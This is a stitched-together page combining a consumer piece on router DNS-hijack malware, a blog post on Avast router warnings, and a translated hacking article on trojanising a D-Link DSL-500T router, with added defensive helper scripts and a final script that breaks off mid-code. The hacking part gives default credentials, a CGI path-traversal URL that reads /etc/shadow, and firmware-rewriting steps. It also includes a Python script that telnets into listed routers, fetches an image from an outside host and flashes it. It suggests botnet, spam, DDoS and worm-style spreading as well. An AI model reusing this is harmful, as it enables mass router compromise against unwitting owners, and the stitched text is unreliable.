Avast writes that the router is vulnerable, infected, and configured incorrectly
Virus in the router: malicious DNS

This may seem strange to you, but there are viruses that infect not computers, laptops, or mobile devices, but routers.

Why? Although your router stores no valuable data of its own, access to it lets an attacker change its DNS server settings. That in turn lets scammers redirect some of your requests to fake sites, where you enter credentials and other sensitive information that is useful to them. Many router models are susceptible; there is no point in listing them, since the list keeps growing. For your safety, I give some recommendations below that will help you avoid infection.

How does the virus work?

Your computer becomes infected with a virus called Win32.Sector. That in turn downloads Trojan.Rbrute from a dedicated server; Rbrute scans the network for routers and tries to log in to their administration interface. Once in, it replaces the DNS addresses configured in the router with its own. From then on, every device connected to the router can be sent to the page from which Win32.Sector is downloaded, and the cycle starts again.

Signs that your router's DNS has been tampered with:

  • The "Internet" indicator is lit, but most sites do not open, or the wrong sites load instead of the ones you asked for
  • Strange websites open by themselves
  • The computer cannot obtain an IP address from your network (it is assigned a link-local address in the 169.254.x.x range, which Windows falls back to when DHCP fails)

How to remove Trojan.Rbrute virus from a router?

  1. First, reset the router to factory settings. Press the "Reset" button on the back of the router and hold it for about 10 seconds, until all the indicators blink and the router reboots.

  2. Go to the router's admin panel and change the default admin password to your own, preferably a complex one.

  3. Configure the router again and check that the Internet works properly.

  4. Download the latest firmware for your model from the manufacturer's official website and flash it. The latest version most likely closes the holes through which attackers got into the router's settings.

  5. Then scan the computer for malware to make sure that neither Win32.Sector nor Trojan.Rbrute remains on the hard drive. You can do this with free anti-malware tools. Note that the order matters: Rbrute runs on the computer and attacks routers from there, so an infected computer left on the network will simply change the router's DNS again; keep it off the network until the scan is clean.

I hope my article helped you =)

Until recently I didn't even know that Avast scares its users with "frightening" warnings about their routers. As it turns out, Avast antivirus scans Wi-Fi routers and reports that the router is configured incorrectly, that the device is vulnerable to attack, or even that the router is infected, that attackers have already hijacked its DNS addresses and are redirecting you to malicious sites and stealing credit card data, and that in general everything is very bad. All these warnings are naturally dressed in alarming red and come with confusing instructions that even a good specialist would struggle to follow, never mind an ordinary user. This is what the problems found on a D-Link DIR-615 router look like:

The device is vulnerable to attacks:

The solution, of course, is to update the router firmware (what else? 🙂). Avast can also report that your router is protected by a weak password, or that the router is not protected from hacking.

In some cases you may see a message that your router is infected and connections are being redirected to a malicious server. Avast explains this by saying that your router was hacked and its DNS addresses were changed to malicious ones, and offers instructions for fixing the problem on routers from different vendors: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys/Cisco, NETGEAR, Sagem/Sagemcom.

In short, all these recommendations come down to checking the DNS addresses and the DNS-related services through which attackers could change the DNS on your router and redirect you to their malicious sites. There are detailed instructions for checking all of this on routers from different manufacturers.

How to respond to warnings from Avast about a router vulnerability?

I think this question interests everyone, especially if you landed on this page. If you are wondering how I would react to such warnings from the antivirus, the answer is simple: not at all. I am sure Avast would find holes in my router through which I could be hacked. I just use Dr.Web, which doesn't do such checks.

Maybe I'm wrong, but no antivirus other than Avast checks the Wi-Fi router you are connected to for various kinds of vulnerabilities. This feature, called Home Network Security, appeared back in 2015, in the Avast 2015 version.

Avast scans your router for security issues, although I don't fully understand how it does it. For example, how does it check the password for entering the router settings? Does it watch the user, or does it try guesses, and if it guesses the password, the password is bad? 🙂 Okay, I'm not a programmer.

Personally, I believe all these warnings are nothing more than simple recommendations to strengthen your router's security. They don't mean someone has already hacked you and is stealing your data. What Avast offers:

  • Set a good password and update the router firmware, because otherwise you may be hacked. Okay, that much is clear; it doesn't need to be flagged as some terrible vulnerability. Although again, I don't understand how the antivirus determines that the router firmware is outdated; it seems to me that this is impossible.
  • The router is not protected from connections from the Internet. Most likely this warning appears after a check of open ports. But by default, access from the WAN (remote management) is disabled on consumer routers as shipped. I highly doubt that anyone will hack your router over the Internet.
  • Well, the worst one is DNS substitution. If any DNS problem is detected, Avast says outright "Your router is infected!" But in 99% of cases this is not so. Again, the router almost always receives DNS from the provider automatically, and all the functions and services through which attackers could somehow spoof DNS are disabled by default. It seems to me that the antivirus very often misreads some user settings.

Something like that. Of course, you may disagree with me. It seems to me that it is much easier to get at the computer directly and infect it than to go through the router, if we are talking about an attack over the Internet. I'll be glad to see your opinion in the comments.

How to protect your router and remove the warning from Avast?

Let's go through each item that Avast most likely checks and warns about.

  • The router is protected with a weak password, or there is no encryption. In the first case, the antivirus means the password you enter to open the router settings. Typically the default password is admin, or there is none at all, so anyone connected to your network can get into the router settings. Therefore this password needs to be changed; I wrote how to do this in a separate article. As for the Wi-Fi password, it must also be strong, and the WPA2 encryption type must be used. I always mention this in my router setup instructions.
  • The router is vulnerable because of old software. This is not entirely true, but if there is new firmware for your model, it is advisable to update: not only for security, but also for more stable operation and new functions. We have instructions on our site for updating the firmware of routers from different manufacturers; find them through the search, or ask in the comments.
  • DNS settings have been changed; the router is hacked. To be honest, I have never seen such a case. As I wrote above, all the services through which this could happen are disabled by default, and most often the router receives DNS from the provider automatically. The only advice I can give is not to enter DNS addresses manually unless you are sure about them, and if you do specify addresses by hand, to use only Google's public DNS servers. Avast recommends the same on its official site, which has detailed instructions for fixing DNS problems on almost every router.
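Below is an added example (my own, not code from Avast or from the article) of how to do from the client side the DNS check that all these recommendations boil down to: it pulls the resolver addresses out of /etc/resolv.conf or Windows "ipconfig /all" output and classifies each one as the router itself, a well-known public resolver, or an unexpected external server that nobody on a home network should be using. The list of public resolvers and the sample ipconfig text are the example's own assumptions, constructed for the demo.

```python
"""Triage the DNS servers a host actually uses, for the 'router DNS hijacked'
class of warning discussed above.

Added example, not from the original article or from Avast. The list of
well-known public resolvers and the sample ipconfig text below are this
example's own assumptions, constructed for the demo.
"""
import ipaddress
import re

# Widely used public resolvers, treated as trusted here (assumption).
KNOWN_PUBLIC = {
    "8.8.8.8", "8.8.4.4",                 # Google Public DNS
    "1.1.1.1", "1.0.0.1",                 # Cloudflare
    "9.9.9.9", "149.112.112.112",         # Quad9
    "208.67.222.222", "208.67.220.220",   # OpenDNS
}

# Where a resolver address is expected on a home network: the router itself
# (RFC 1918), loopback (a local stub resolver) and link-local.
LAN_RANGES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

_IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed sample: the router hands out itself plus one odd resolver.
SAMPLE_IPCONFIG = """   IPv4 Address. . . . . . . . . . . : 192.168.1.23
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 192.168.1.1
                                       203.0.113.53
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""


def extract_dns_servers(text):
    """Pull resolver IPs from /etc/resolv.conf or Windows 'ipconfig /all' text."""
    lines = text.splitlines()
    servers = []
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.lstrip().startswith("nameserver"):
            servers += _IPV4.findall(line)
        elif "DNS Servers" in line:
            servers += _IPV4.findall(line)
            # ipconfig prints additional servers on indented lines without ':'
            while (i + 1 < len(lines) and lines[i + 1].startswith((" ", "\t"))
                   and ":" not in lines[i + 1]):
                i += 1
                servers += _IPV4.findall(lines[i])
        i += 1
    return servers


def classify_resolver(server):
    """'lan' = the router or a local stub (normal), 'public' = known resolver,
    'suspicious' = an external resolver nobody on this LAN should be using."""
    ip = ipaddress.ip_address(server)
    if any(ip in net for net in LAN_RANGES):
        return "lan"
    if server in KNOWN_PUBLIC:
        return "public"
    return "suspicious"


def dns_hijack_report(text):
    """Return (verdicts, suspicious) for the resolvers found in `text`."""
    verdicts = {s: classify_resolver(s) for s in extract_dns_servers(text)}
    suspicious = sorted(s for s, v in verdicts.items() if v == "suspicious")
    return verdicts, suspicious


if __name__ == "__main__":
    verdicts, suspicious = dns_hijack_report(SAMPLE_IPCONFIG)
    for server, verdict in verdicts.items():
        print(f"{server:18} {verdict}")
    if suspicious:
        print("Possible DNS hijack, compare with the router's WAN DNS:", suspicious)
```

One caveat: if the only resolver listed is the router's own address, this check cannot see where the router forwards queries to. In that case open the router's admin page and compare its WAN and DHCP DNS entries with your provider's or a public resolver's addresses, which is exactly what the per-vendor instructions Avast points to walk through.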

That's all. I hope I have managed to explain these Avast warnings at least a little. Ask questions in the comments, and don't forget to share useful information on this topic. Best wishes!

In light of the growing number of cases of DNS substitution by malware on Internet users' devices, the question of Wi-Fi router security arises. How do you check a router for viruses? How do you remove a virus from a router? The question is complex and simple at the same time, and there is a solution!


Most router malware does not write itself into the router's limited flash memory; it lives in RAM, but while it runs it can "zombify" the router into a botnet. As a rule this is a botnet for attacking various servers, or for redirecting and analysing the traffic that leaves your network for the Internet.

Your passwords and personal correspondence could fall into the hands of attackers!

This needs to be fixed as quickly as possible.

  • Resetting the router
  • Router firmware

Resetting the router

You can reset the router settings with the reset button. Usually it is on the back of the router next to the LAN ports, and usually it is recessed in a hole to avoid accidental presses, so you need a toothpick. This removes the settings changed by the virus and restores the factory settings. I must warn you: if you do not know how to configure a router, you should not reset it!

Router firmware

Sometimes the malware "uploads" modified firmware to the router. To remove such firmware, reflash the router.

Connect the computer to the router with a LAN cable (one is included with any router), or over Wi-Fi if a cable connection is impossible. A cable is better: a wireless connection is considered unstable and is unsuitable for updating firmware, since an interrupted upload can leave the router unbootable.

Once connected, open a browser (Chrome, Opera, Firefox, IE) and enter the router's address in the address bar; for ASUS it is 192.168.1.1. On the page that opens, enter the login and password for the router settings: login admin, password admin. If they don't work, ask the person who set up the router for you; they may have changed them.

Download the firmware from the manufacturer's website and select the file on disk from the router's settings page. For the vast majority of routers the firmware steps are the same.

Hello, reader! In this article I will talk about those great ADSL routers, pieces of hardware that are indispensable in home and industrial networks. I'll cover the question of exploiting these boxes for purposes useful to us: embedding a brutal Trojan inside the router, and doing it in a way that neither a smart admin nor a smart user would notice.

Prerequisites, or IQ requirements

When I wrote this article, I assumed the reader would be a reasonably advanced user with GNU/Linux installed who also has some skill in working and programming in that OS. It should be possible to repeat my steps on Windows (using Cygwin, for example), but that is not described here. For maximum enjoyment you also need soldering skills (optional).

And it all began...

I've digressed. So, it all started when this same piece of hardware hung one day; more precisely, it treacherously dropped the Internet connection and would not restore it. It was physically out of reach at the time (well, I'm lying a bit: I was just too lazy to get up from the sofa and reboot the router :)), the Web interface did not respond, but I remembered that this thing should have telnet or ssh. I had never tried logging in to the administration area before and had recklessly not changed the account password (as it turned out later, very much in vain, because by default it is "admin:admin"). So I tried SSH, and it worked!

$ ssh admin@192.168.1.1
Password:

Like a bolt from the blue: BusyBox! I had never thought about what this router runs on, and it turns out it is GNU/Linux! I was gripped by curiosity about how everything works here and, mentally thanking laziness and chance, I went off to investigate.

Collecting information

So where did I start? Naturally, with the list of available commands:

# busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, yes

The set is quite reasonable, enough for normal research and for implementing ideas. Next, I was interested in the kernel version:

# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006

For reference: MontaVista is a distribution aimed at embedded systems. The vast majority of network equipment manufacturers prefer it. It can also be found on other devices, for example e-book readers or mobile phones.

# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
processor               : 0
cpu model               : MIPS 4KEc V4.8
BogoMIPS                : 149.91
wait instruction        : no
microsecond timers      : yes
extra interrupt vector  : yes
hardware watchpoint     : yes
VCED exceptions         : not available
VCEI exceptions         : not available

AR7 is a dual-core chip developed by Texas Instruments. It contains a complete ADSL router on a single chip, supporting ADSL1, ADSL2 and ADSL2+, built around a high-performance MIPS 4KEc RISC core clocked at 175 or 233 MHz (depending on the process: 0.18 µm or 0.13 µm). The chip has two UART interfaces, one of which (UART_A) is used for debug output, and an EJTAG interface for debugging and (re)programming the flash memory. The use of these interfaces is described below.

Finally, I looked at the memory information:

# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: size erasesize name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Naturally, without forgetting the block addresses:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

From the above it follows that the flash memory (/dev/mtdblock) has 5 blocks:

mtd0 – the SquashFS file system image. This is a compressed, read-only file system. Normally gzip is used for compression, but here it is LZMA (a higher compression ratio). The block is 0x34f000 bytes, about 3.5 MB.

mtd1 – the MontaVista kernel, stored LZMA-compressed; block size about 600 KB.

mtd2 – the ADAM2 bootloader. It loads the kernel and also contains a service FTP server for recovery and flashing; more on it below. Block size 64 KB.

mtd3 – shared between configuration data and the environment (environment variables), which you can view in /proc/ticfg/env. The configuration data lives in /etc/config.xml; the intermediary between the file system and the configuration block is the closed-source program cm_logic (like all the cm_* programs, more on them later). Block size also 64 KB.

mtd4 – holds the firmware signature, the kernel and the file system image. Note from the address table that it covers the same range as mtd1 and mtd0 together. This block is used when updating the firmware via the Web interface: the update is first stored here, then the checksum is verified and, if it matches, the image is written to its final place.

RAM (16 MB in this model, although the ADAM2 shipped with it sees only 14 MB; fixed by updating the bootloader) is mounted at /var, and you can freely use it for our purposes:

# free
              total         used         free       shared      buffers
  Mem:        14276        10452         3824            0

Let's not forget the process list. Among the interesting daemons lurking here: thttpd, the Web server; dproxy, a caching DNS proxy; ddnsd, the DNS daemon; and pppd, the daemon that implements the PPP connection, whose command-line parameters show the account details. So unless the router is acting as a dumb modem (i.e., not in bridge mode), the ISP account can easily be read from the process list.

The cm_* programs are closed-source, and the source package ships only their compiled binaries (these programs are also developed by Texas Instruments, so there is no point arguing with D-Link about license compliance).

cm_logic – the program that controls the system's logic; all configuration goes through it. It synchronises /etc/config.xml with the corresponding part of /dev/ticfg (which points at mtd3).

cm_cli – a command-line interface for managing and configuring the system. Connection settings, for example, are made through it.

cm_pc – starts and monitors processes according to the rules described in /etc/progdefs.xml (for example, run this program as a daemon; the rules also carry information about open ports). It is started right after the kernel.

webcm – the CGI interface. It is leaky: for example, it lets you read /etc/shadow simply by requesting a URL. The obvious traversal

http://192.168.1.1/../../../etc/shadow

got me nothing, thttpd is not that naive, but this works:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Another thing: this can be used to gather information when there is no ssh/telnet access but the Web interface is reachable.

firmwarecfg – used for flashing firmware via the Web interface. It receives the image in a POST request from the Web interface and writes it to flash after first checking the image's checksum.

At this point the collection of preliminary information is complete; time to move on to decisive action.

Installing the development tools and compiling the firmware

The firmware for D-Link routers (and all others based on GNU/Linux) is distributed under the GPL; you can get it from the official FTP server. In fact, you can choose any of the listed firmware packages, they are the same (as far as the T-series is concerned). The package includes the kernel source, the environment, the necessary tools and a toolchain for developing and compiling the existing programs. Unpack it to the root and add the toolchain's bin directory to the PATH environment variable:

$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/

Now, to compile your own firmware, go to the source directory and run make:

$ cd DSL/TYLinuxV3/src && make

You will be asked a lot of questions about enabling device support (better to answer yes). When compilation finishes, firmware images appear in the TYLinuxV3/images directory. You can also run the script named after your model from the TYLinuxV3/src/scripts directory.

A few words about transferring files between the router and the computer. The very first method I used was file transfer over SSH with scp. A little later I learned that mc (Midnight Commander) can also connect over SSH (Panel -> Shell connection). Alternatively, you can set up a Web or FTP server on your workstation. Later I preferred the Web server, because it works fastest. I installed thttpd, small and fast, the same as on the router. Start it at home and download the file onto the router after changing to /var (which, as mentioned, is writable):

$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# wget http://192.168.1.2/file

To download a file from the router, you can likewise start a Web server on it:

# thttpd -g -d /var -u root -p 8080

Note that if you want to download an executable file from the router, you should remove its execute permission first. When downloading many files from the router, mc is more convenient: you won't need to copy files to /var, strip permissions and then delete them to free space. In general it's a matter of taste; choose whatever is convenient for you.

Writing your own program

Let's start, naturally, with the programming classic, HelloWorld. There are no special rules. The code is painfully familiar:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    printf("Mate.Feed.Kill.Repeat.\n");
    return 0;
}

Compile it (the toolchain path must be in PATH), copy it to the router's /var and run it:

$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

# cd /var
# chmod +x hell
# ./hell

And... nothing happens, or a "path not found" message appears. What's going on? I already mentioned cm_pc: this program launches others according to the rules described in /etc/progdefs.xml. So now it's time to modify and flash the file system image.

Modifying the file system

To modify the file system you first need to unpack it. As I mentioned, the file system here is SquashFS with the LZMA patch. The firmware development package includes only mksquashfs (for creating an image); unsquashfs (for unpacking) is missing. No matter: everything is available on the file system's website, and we need the first version. Apply the LZMA patch, build the utilities and put them somewhere convenient. First, get the file system image from the router:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

Now you can modify it as you like; we'll put our hello program in the image's /bin directory and add a rule to run it in /etc/progdefs.xml.

$ cp hell unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

Add a program entry for it alongside the existing ones, giving the name and the path:

hell
/bin/hell

Save and pack it back:

$ mksquashfs unpacked_fs my_fs.img -noappend

Note that the file system image must not exceed the size of the mtd0 partition. If you urgently want to try something and it doesn't fit, remove something "unnecessary" from the image such as grep or whoami, or use the UPX executable packer. Now upload the image to the router and move on to the next section.

Writing the file system image

Flashing the router is very simple: it comes down to writing to the /dev/mtdblock/* device. So upload the file system image to the router in any convenient way and perform this simple action (either form works):

# cat my_fs.img > /dev/mtdblock/0 && reboot

# cp my_fs.img /dev/mtdblock/0 && reboot

After a while, when the write has finished, the router reboots and the changes take effect. Let's try running our example:

# hell
Mate.Feed.Kill.Repeat.
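As an added example (not part of the original article), here is the check I would run on the workstation before the cat-to-mtdblock step above: it parses the /proc/mtd and /proc/ticfg/env output shown earlier, confirms that the two views of the flash agree on partition sizes, verifies that the image starts with a SquashFS magic and fits mtd0, and lists which other partitions a target overlaps (mtd4 spans mtd1 and mtd0 on this router). SAMPLE_MTD and SAMPLE_ENV reproduce the router's values from above; the image bytes and the set of recognised magic values are this example's own assumptions.

```python
"""Pre-flight check before writing a file system image to /dev/mtdblock/N on
an AR7 router with the ADAM2 bootloader, such as the DSL-500T above.

Added example, not part of the original article. SAMPLE_MTD and SAMPLE_ENV
reproduce the values printed earlier on the page; the image bytes in __main__
are constructed for the demo. Which superblock magic a vendor's LZMA build
uses is an assumption: only the standard "hsqs"/"sqsh" forms are recognised.
"""
import re

SQUASHFS_MAGICS = (b"hsqs", b"sqsh")   # little-endian / big-endian magic

SAMPLE_MTD = """dev:    size   erasesize  name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
"""

SAMPLE_ENV = """mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
"""


def parse_proc_mtd(text):
    """Parse /proc/mtd into {name: (size, erasesize)}, values in bytes."""
    table = {}
    pattern = r'^(mtd\d+):\s+([0-9a-fA-F]+)\s+([0-9a-fA-F]+)\s+"'
    for m in re.finditer(pattern, text, re.M):
        table[m.group(1)] = (int(m.group(2), 16), int(m.group(3), 16))
    return table


def parse_env_ranges(text):
    """Parse the 'mtdN start,end' lines of /proc/ticfg/env into {name: (start, end)}."""
    ranges = {}
    pattern = r'^(mtd\d+)\s+(0x[0-9a-fA-F]+),(0x[0-9a-fA-F]+)'
    for m in re.finditer(pattern, text, re.M):
        ranges[m.group(1)] = (int(m.group(2), 16), int(m.group(3), 16))
    return ranges


def layout_mismatches(mtd_text, env_text):
    """Names whose /proc/mtd size differs from the env range length.
    A mismatch means the kernel and the bootloader disagree; do not write."""
    sizes = parse_proc_mtd(mtd_text)
    ranges = parse_env_ranges(env_text)
    return sorted(name for name, (start, end) in ranges.items()
                  if name in sizes and sizes[name][0] != end - start)


def overlapping(env_text, partition):
    """Other env ranges that share flash with `partition`; writing the
    partition clobbers all of them."""
    ranges = parse_env_ranges(env_text)
    if partition not in ranges:
        return []
    start, end = ranges[partition]
    return sorted(n for n, (s, e) in ranges.items()
                  if n != partition and s < end and start < e)


def preflight(image, partition, mtd_text, env_text):
    """Return a list of problems; an empty list means the write may proceed."""
    sizes = parse_proc_mtd(mtd_text)
    if partition not in sizes:
        return [f"{partition} is not listed in /proc/mtd"]
    size, _erasesize = sizes[partition]
    problems = []
    if image[:4] not in SQUASHFS_MAGICS:
        problems.append("image does not start with a SquashFS magic")
    if len(image) > size:
        problems.append(f"image exceeds {partition} by {len(image) - size} bytes "
                        f"(partition is {size} bytes)")
    problems += [f"{n}: /proc/mtd size disagrees with /proc/ticfg/env"
                 for n in layout_mismatches(mtd_text, env_text)]
    return problems


if __name__ == "__main__":
    # Constructed stand-in for my_fs.img: a SquashFS magic plus padding.
    image = b"hsqs" + b"\0" * 4092
    print("problems:", preflight(image, "mtd0", SAMPLE_MTD, SAMPLE_ENV) or "none")
    print("mtd4 overlaps:", overlapping(SAMPLE_ENV, "mtd4"))
```

Feed it the real output (cat /proc/mtd and grep mtd /proc/ticfg/env over ssh) and your my_fs.img. After the write, and before rebooting, read the partition back over ssh with cat /dev/mtdblock/0, truncate the copy locally to the image length and compare checksums; the router's BusyBox has no md5sum, so do that on the workstation.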

Recovery methods in case of failure

Before flashing the router with more serious "creations", you should find out what to do in the critical case when the router refuses to boot. There are no hopeless situations: the ADAM2 FTP server comes to the rescue. First, connect an FTP client to ADAM2's IP address, which you can find in /proc/ticfg/env (the my_ipaddress parameter).

$ ftp 192.168.1.199
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.

For clarity, you can turn on debug mode in the ftp client (the debug command), which then shows every command sent and every FTP response.

Login/password: adam2/adam2. The flashing process is very simple. First switch the session to binary mode and tell ADAM2 that the target medium is flash:

ftp> binary
ftp> quote MEDIA FLSH

Now send, for example, the file system image and indicate the destination:

ftp> put fs.img "fs.img mtd0"

Wait for the write to finish, reboot the router and exit the session:

ftp> quote REBOOT
ftp> quit

That's it! As you can see, there's nothing complicated; now if something goes wrong, you can always fix it.

For convenience you should give it a normal IP address, enable automatic boot (so you don't have to dance with the reset button) and slightly increase the wait for a connection before the kernel loads. All these parameters live in environment variables, and ADAM2's FTP server has special commands for them: GETENV and SETENV (to read and set a variable respectively). Send them with quote in the FTP session:

ftp> quote SETENV autoload,1
ftp> quote SETENV autoload_timeout,8
ftp> quote SETENV my_ipaddress,192.168.1.1
ftp> quote REBOOT
ftp> quit

The router reboots and ADAM2 is reachable at 192.168.1.1:21. If you decide to reflash the kernel image and the kernel refuses to boot, the FTP server starts by itself. Before flashing modified images, be sure to save the current ones for restoration. In general, you can also change the environment variables via /proc/ticfg/env; I just wanted to say more about working over FTP.

# echo my_ipaddress 192.168.1.1 > /proc/ticfg/env

You can check the change like this:

# cat /proc/ticfg/env | grep my_ipaddress

What if you want to try reflashing the bootloader, and what do you do if that fails? Or the router for some reason does not start at all and there is no access to ADAM2? There is a solution: JTAG, or more precisely EJTAG (the extended version), which this chip contains. It is an interface for in-circuit debugging and programming.

To connect to this interface we need the computer's LPT port, connectors and 4 resistors. The circuit is simple.

I hasten to note that flashing over JTAG is not quick; it takes quite a lot of time, so it should be used only for restoring the bootloader, and only when nothing else works. To talk over JTAG you use a special program, for example UrJTAG. Below is an example of working with this interface. Connection setup:

jtag> cable parallel 0x378 DLC5
jtag> detect

Flash memory detection:

jtag> detectflash 0x30000000 1

Reading the flash memory:

jtag> readmem 0x30000000 0x400000 fullflash.img

Writing to memory (the bootloader):

jtag> flashmem 0x30000000 adam2.img

It's also useful to know about the UART interface (I promised earlier to talk about it). The bootloader logs to UART_A (at an early stage of boot you can talk to it from there), and so does the kernel; when writing modified kernels this is indispensable for debugging. UART, Universal Asynchronous Receiver/Transmitter, is present on almost every microcontroller.

The adapter circuit is very simple, built around a single level-converter chip: MAX232 for a COM port or FT232R for USB. These chips are common and there will be no problems buying them.

The circuit is assembled on a breadboard (it easily fits inside a COM-port connector housing) in 20 minutes and is very useful; for kernel debugging, for example, it is absolutely irreplaceable. And if electronics is a problem? A way out is the USB data cables for old phones: they contain exactly such a UART-USB converter.

Some distribution ideas

Having your own proxy/SOCKS on someone else's router is great. So is spamming from the router over every protocol. This is not a Windows computer that gets reinstalled every month :). Routers are rarely replaced or reflashed. And who besides us would even think of infecting a router?

Don't forget that we control all the traffic of the user/network. On more powerful routers you can already hang a DDoS bot. Hiding files, hiding processes, intercepting writes to the mtd blocks so that our program is not overwritten: anything you like!

Let's say you're about to write a serious program for a router. Good debugging is important; you'll probably have to rewrite/restore the images a bunch of times... a very sad prospect. Your hands drop a little if you also consider that the rewrite endurance of the flash memory is small (see the documentation for the memory chip) and there is a real chance of ruining it. But there's a way out: QEMU can emulate the AR7! Can you imagine the possibilities and the unlimited convenience this gives? Now nothing stops us from writing something incredibly cool!

So, you've written a program and tested it on your own router or a couple of other people's, but the whole network is still ahead; infecting it manually is a chore, by the 10th router you start cursing the whole world and strings of "cat" and "mtd" float before your eyes. Let's write a program to automate these routine actions. I chose Python.

The work plan is as follows:

  • compile a list of routers, for example with nmap;
  • the script takes IP addresses from the list in turn and logs in via telnet with the default login/password;
  • then the same steps as before: upload the modified image, rewrite, reboot.

#!/usr/bin/env python
# coding: utf-8
"""Log in to each router from iplist.txt over telnet with the default
credentials, fetch the prepared file system image and write it to mtd0."""
import telnetlib
import time

SERVER = "http://anyhost.com/fs.image"

for addr in open("iplist.txt"):
    addr = addr.strip()
    if not addr:
        continue
    telnet = telnetlib.Telnet(addr)
    telnet.set_debuglevel(1)
    telnet.read_until(b"login:")
    time.sleep(5)
    telnet.write(b"admin\n")
    telnet.read_until(b"Password:")
    telnet.write(b"admin\n")
    telnet.read_until(b"#")
    # every command needs a trailing newline, or the shell never runs it
    telnet.write(b"cd /var && wget " + SERVER.encode() + b"\n")
    telnet.read_until(b"#")
    telnet.write(b"cat fs.image > /dev/mtdblock/0\n")
    telnet.read_until(b"#")
    telnet.write(b"reboot\n")
    telnet.close()

The script's logic is far from ideal, and I'll explain why. First, you should check the firmware/kernel version and the router model, because there can be serious differences in how they work. Second, instead of prepared firmware blanks, you should download the file system image from the router itself, unpack it, modify it and send it back; this removes the compatibility problems between different models and firmware versions, and stability is the most important thing for you. Also, the virus can have worm functionality, and if you wish you can always bolt on a network scanner, an RDP brute-forcer and similar features.

There is another great way to distribute. Nothing stops you from writing a Windows program that carries (or downloads from your server) the file system image and infects the router with it if one is present. Spread it in all the "standard" ways: removable drives, exploits for programs, infecting other programs... Combining these methods you can create a serious pandemic. Just imagine: such devices are everywhere.

Protecting the router

Having dug all this up, I wondered: how can I protect the router? Otherwise, you see, someone will get to mine too. The first step is to change the user's password to a longer and more complex one (limit: 8 characters), and to change the banners and service greetings (with a hex editor or, preferably, by recompiling the programs) so that nmap and other scanners cannot determine service versions.

You should also change the ports the daemons listen on; this is done by modifying progdefs.xml. Kill telnet (the easiest way in is guessing its password, and the protocol is unencrypted anyway; why keep it), enable the firewall and allow connections to the services only from your own IP or MAC address. Also use the firewall to protect the network or the computer; it's there for a reason. Sensibly configured rules will always help you protect yourself.
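As an added example (mine, not the article's), here are the two checks I would script for the webcm leak described earlier and for the password advice in this section: one requests the getpage URL and reports whether a shadow file came back, the other classifies the hashes in a shadow file and flags accounts with no password or with traditional DES crypt(3), which only looks at the first 8 characters of a password (this is the likely reason for the 8-character limit mentioned above; the connection is my addition, not the article's). The router URL is a parameter and the sample shadow text is constructed; run the network probe only against a router you administer.

```python
"""Two checks for weaknesses discussed in the article: whether the router's
webcm CGI hands out /etc/shadow through 'getpage', and what the password
hashes in that file say about the account passwords.

Added example, not part of the original article. webcm_leaks_shadow() talks
to a router URL you supply (run it only against a router you administer);
SAMPLE_SHADOW is constructed for the demo and is not taken from any real
device. Linking the '8-character limit' to DES crypt(3), which uses only the
first 8 characters of a password, is this example's own explanation.
"""
import urllib.error
import urllib.request

WEBCM_PROBE = "/cgi-bin/webcm?getpage=/etc/shadow"

SAMPLE_SHADOW = (
    "root:abJnggxhB/yWI:10957:0:99999:7:::\n"     # 13-char DES crypt hash
    "admin::10957:0:99999:7:::\n"                  # empty password field
    "nobody:*:10957:0:99999:7:::\n"                # locked account
)


def hash_kind(field):
    """Classify the password field of a shadow entry."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in (("$1$", "md5-crypt"), ("$5$", "sha256-crypt"),
                         ("$6$", "sha512-crypt"), ("$2", "bcrypt")):
        if field.startswith(prefix):
            return name
    if len(field) == 13:
        return "des-crypt"      # traditional crypt(3): 2-char salt + 11 chars
    return "unknown"


def parse_shadow(text):
    """Return [(user, kind)] for every well-formed entry in shadow text."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0]:
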